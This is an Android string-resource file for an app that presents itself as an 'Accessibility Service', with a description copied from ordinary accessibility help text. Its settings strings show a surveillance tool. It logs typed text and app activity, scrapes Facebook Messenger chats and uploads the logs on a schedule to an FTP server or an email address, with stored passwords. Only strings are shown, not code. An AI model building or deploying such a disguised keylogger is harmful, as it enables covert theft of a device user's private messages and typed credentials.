<resources>
    <string name="app_name">Accessibility Service</string>
    <string name="description">Android accessibility features and apps enable you to customize your Android device to suit your needs. A brief summary of features is below, along with links to more information.

Services and tools for using your Android device
Screen reader (TalkBack): TalkBack is a screen reader that\'s included on your Android device. TalkBack uses spoken feedback to describe your actions and to tell you about alerts and notifications. Learn more about TalkBack.
Switch access: Switch access enables you to control your device with one or more switches. For users with limited mobility, switch access provides an alternative to using the touch screen. Learn more about switch access. (Android 5.0+)
Braille support (BrailleBack): BrailleBack is an add-on accessibility service that lets you connect a supported refreshable braille display to your Android device via Bluetooth. BrailleBack works with TalkBack for a combined speech and braille experience, allowing you to input text and interact with your Android device. Learn more about BrailleBack.</string>
    <string name="title_activity_settings">AccessibilityService Settings</string>

    <!-- Strings related to Settings -->
    <string-array name="empty_array" />

    <!-- Example General settings -->
    <string name="pref_header_general">General</string>

    <string name="pref_title_display_name">Display Name</string>
    <string name="pref_display_name_summary">Set the username visible in the logs.</string>
    <string name="pref_key_display_name">KEY_DISPLAY_NAME</string>
    <string name="pref_default_display_name">You</string>

    <!-- Event Logging Settings -->
    <string name="pref_events_title">Event Tracking</string>

    <string name="pref_title_event_general">General Events</string>
    <string name="pref_event_general_summary">Logs general events. Such as clicking on Buttons. Opening applications, …</string>
    <string name="pref_key_event_general">KEY_EVENT_GENERAL</string>

    <string name="pref_title_event_text">Text Events</string>
    <string name="pref_event_text_summary">Logs text typed in EditText widgets.</string>
    <string name="pref_key_event_text">KEY_EVENT_TEXT</string>

    <string name="pref_events_experimental_title">Experimental Event Tracking</string>

    <string name="pref_title_chat_event">Chat Events</string>
    <string name="pref_chat_event_summary">Scrapes chat messages from popular chat apps. Defined below</string>
    <string name="pref_key_chat_event">KEY_CHAT_EVENT</string>

    <!-- Chat Applications -->
    <string name="pref_events_experimental_apps_title">Chat Applications</string>
    <string name="pref_events_apps_title">Available Apps</string>
    <string name="pref_key_apps">KEY_CHAT_APPS</string>
    <string name="pref_events_app_summary">Select the social apps you want the service to track the chat messages from.</string>
    <string-array name="pref_events_apps_titles">
        <item>Messenger</item>
    </string-array>
    <string-array name="pref_events_apps_values">
        <item>com.facebook.orca</item>
    </string-array>

    <!-- Example settings for Data & Sync -->
    <string name="pref_header_data_sync">Data &amp; Sync</string>

    <string name="pref_title_sync_frequency">Sync Frequency</string>
    <string name="pref_key_sync_frequency">sync_frequency</string>
    <string name="pref_frequency_title">Frequency</string>
    <string-array name="pref_sync_frequency_titles">
        <item>15 minutes</item>
        <item>30 minutes</item>
        <item>1 hour</item>
        <item>3 hours</item>
        <item>6 hours</item>
        <item>Every day</item>
        <item>Never</item>
    </string-array>
    <string-array name="pref_sync_frequency_values">
        <item>15</item>
        <item>30</item>
        <item>60</item>
        <item>180</item>
        <item>360</item>
        <item>1440</item>
        <item>-1</item>
    </string-array>

    <!-- FTP Upload Service -->
    <string name="pref_FTP_title">FTP</string>
    <string name="pref_sync_frequency_summary">Controls the frequency the uploaderTask task is scheduled to upload the log files. (TASKS ARE BATCHED SO BE PATIENT!)</string>

    <string name="pref_key_FTP">FTP_UPLOAD</string>
    <string name="pref_title_ftp">FTP Upload</string>
    <string name="pref_ftp_summary">Whether or not you want the logs to be uploaded to your FTP server.</string>

    <string name="pref_key_ftp_host">FTP_HOST</string>
    <string name="pref_title_ftp_host">Host</string>

    <string name="pref_key_ftp_username">KEY_FTP_USERNAME</string>
    <string name="pref_title_ftp_username">Username</string>

    <string name="pref_key_ftp_password">FTP_PASSWORD</string>
    <string name="pref_title_ftp_password">Password</string>

    <string name="pref_key_ftp_path">FTP_PATH</string>
    <string name="pref_title_ftp_path">Path</string>

    <!-- Email Upload Service -->
    <string name="pref_email_title">Mail</string>

    <string name="pref_key_email">EMAIL_UPLOAD</string>
    <string name="pref_title_email">Email Upload</string>
    <string name="pref_email_summary">Whether or not you want the logs to be send to an email-address.</string>

    <string name="pref_key_email_from">EMAIL_FROM</string>
    <string name="pref_title_email_from">Email From</string>
    <string name="pref_email_from_summary">The email-address which you want to send the email from.</string>

    <string name="pref_key_email_to">EMAIL_TO</string>
    <string name="pref_title_email_to">Email To</string>
    <string name="pref_email_to_summary">The email-address where you want to receive the logs.</string>

    <string name="pref_key_email_password">EMAIL_PASSWORD</string>
    <string name="pref_title_email_password">Password</string>
    <string name="pref_title_upload_format">Upload Format</string>
    <string name="pref_sync_format_summary">The format in which the log is uploaded.</string>
    <string name="pref_key_upload_format">upload_format_key</string>
    <string-array name="pref_upload_format_title">
        <item>HTML</item>
        <item>JSON</item>
    </string-array>
    <string-array name="pref_upload_format_values">
        <item>0</item>
        <item>1</item>
    </string-array>
</resources>